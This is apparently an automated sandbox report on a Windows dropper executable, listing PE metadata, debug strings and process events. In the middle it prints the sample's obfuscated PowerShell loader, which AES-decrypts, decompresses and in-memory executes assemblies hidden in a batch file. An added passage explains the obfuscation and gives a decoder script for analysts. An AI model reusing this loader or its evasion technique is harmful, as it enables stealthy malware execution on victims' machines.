                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: XgKnAQpuPM.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: XgKnAQpuPM.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
                    Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
                    Source: XgKnAQpuPM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: XgKnAQpuPM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: XgKnAQpuPM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: XgKnAQpuPM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: XgKnAQpuPM.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    Source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, ---.cs | .Net Code: _F6A9_24CA_2622_EF60_FFFD System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 
'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
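
                    Removing the blck padding that the quoted strings carry and that .Replace('blck', '') strips at run time gives the loader its real shape: FpxON is AES-CBC/PKCS7 decryption with the hard-coded 32-byte key (so AES-256) and 16-byte IV; ogptr is System.IO.Compression.GZipStream decompression through a System.IO.MemoryStream; VcYYT is [System.Reflection.Assembly]::Load on the result followed by EntryPoint.Invoke($null, (,[string[]]'')), i.e. calling the assembly's Main with an empty argument array. The carrier is the first line of vclib.bat that starts with ':: ' (a comment to cmd.exe), holding two base64 blobs separated by a backslash; each is base64-decoded, decrypted, gunzipped and loaded in turn. The padding keeps the type and method names out of the command line for plain string matching, but each Invoke-Expression hands the reconstructed text to the engine as a new script block, so AMSI (amsi.dll is loaded by powershell.exe above) and 4104 logging see the de-padded form. The following is an added example, not code from the report or from the sample, that re-implements that decode chain so it writes the two assemblies to disk for static analysis instead of loading them; the key and IV are the ones in the captured command line, the batch-file path and output directory are assumptions, and -Demo builds a constructed vclib.bat with fake 'MZ' blobs so the script can be run without the dropped file:

```powershell
# Added example, not part of the report or the sample: a safe re-implementation of
# the vclib.bat decode chain. It decrypts and decompresses the embedded blobs
# exactly as the loader does, then writes them to disk instead of calling
# [System.Reflection.Assembly]::Load and EntryPoint.Invoke.
param(
    [string]$BatchPath = (Join-Path $env:TEMP 'vclib.bat'),        # assumption: analyst's copy of the dropped file
    [string]$OutDir    = (Join-Path $env:TEMP 'vclib_payloads'),   # assumption: where decoded blobs are written
    [switch]$Demo                                                  # build a constructed vclib.bat first
)

# Key (32 bytes, AES-256) and IV (16 bytes) exactly as they appear in the captured command line.
$Key = [Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU=')
$IV  = [Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ==')

# Equivalent of the loader's FpxON (decrypt). -Encrypt is only used to build the demo file.
function Invoke-AesCbc {
    param([byte[]]$Data, [switch]$Encrypt)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $xf = if ($Encrypt) { $aes.CreateEncryptor() } else { $aes.CreateDecryptor() }
    try     { $out = $xf.TransformFinalBlock($Data, 0, $Data.Length); return ,$out }   # ',' keeps the byte[] whole
    finally { $xf.Dispose(); $aes.Dispose() }
}

# Equivalent of the loader's ogptr (GZip decompress).
function Expand-Gzip {
    param([byte[]]$Data)
    $in  = [System.IO.MemoryStream]::new($Data)
    $out = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GZipStream]::new($in, [System.IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

# Inverse of Expand-Gzip, used only to build the demo carrier line.
function Compress-Gzip {
    param([byte[]]$Data)
    $out = [System.IO.MemoryStream]::new()
    $gz  = [System.IO.Compression.GZipStream]::new($out, [System.IO.Compression.CompressionMode]::Compress, $true)
    $gz.Write($Data, 0, $Data.Length); $gz.Dispose()
    $bytes = $out.ToArray(); $out.Dispose()
    return ,$bytes
}

# The carrier: first line starting with ':: ' (a cmd.exe comment), base64 blobs split on '\'.
function Get-VclibPayloads {
    param([string]$Path)
    $carrier = [System.IO.File]::ReadAllLines($Path) | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $carrier) { throw "No ':: ' carrier line in $Path" }
    $list = [System.Collections.Generic.List[byte[]]]::new()
    foreach ($b64 in $carrier.Substring(3).Split('\')) {
        $cipher = [Convert]::FromBase64String($b64)
        $list.Add((Expand-Gzip -Data (Invoke-AesCbc -Data $cipher)))
    }
    return $list
}

# Builds a constructed vclib.bat with two fake blobs encoded the same way as the real ones.
function New-DemoBatch {
    param([string]$Path)
    $blobs = foreach ($tag in 'A', 'B') {
        $fake = [System.Text.Encoding]::ASCII.GetBytes("MZ constructed payload $tag, not a real PE")
        [Convert]::ToBase64String((Invoke-AesCbc -Data (Compress-Gzip -Data $fake) -Encrypt))
    }
    $lines = @('@echo off', (':: ' + ($blobs -join '\')), 'rem the real loader stages (wmic/findstr check, echo | powershell) are omitted here')
    [System.IO.File]::WriteAllLines($Path, [string[]]$lines)
}

if ($Demo) { New-DemoBatch -Path $BatchPath }
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
$payloads = @(Get-VclibPayloads -Path $BatchPath)
for ($i = 0; $i -lt $payloads.Count; $i++) {
    $p    = $payloads[$i]
    $isMz = ($p.Length -ge 2 -and $p[0] -eq 0x4D -and $p[1] -eq 0x5A)   # PE / .NET assemblies start with 'MZ'
    $file = Join-Path $OutDir "payload_$i.bin"
    [System.IO.File]::WriteAllBytes($file, $p)
    $sha  = (Get-FileHash -Algorithm SHA256 -Path $file).Hash
    '[{0}] {1} bytes, MZ header: {2}, SHA256 {3}, written to {4}' -f $i, $p.Length, $isMz, $sha, $file
}
```

                    Run it as .\decode-vclib.ps1 -Demo to see the round trip on the constructed file, or point -BatchPath at the vclib.bat recovered from IXP000.TMP to get the two real assemblies as payload_0.bin and payload_1.bin with their hashes; an MZ header on both is the expected result, since the loader passes them straight to Assembly.Load. The script never executes the decoded bytes, so it is safe to run on an analysis host, and because the key and IV are fixed in the dropper the same script works for any vclib.bat produced by this builder until those constants change.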
                    Source: XgKnAQpuPM.exe | Static PE information: 0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Code function: 0_2_00007FF776D11D10 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Code function: 0_2_00007FF776D115F4 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA
                    Source: C:\Users\user\Desktop\XgKnAQpuPM.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 (4 identical events)
                    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (29 identical events)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
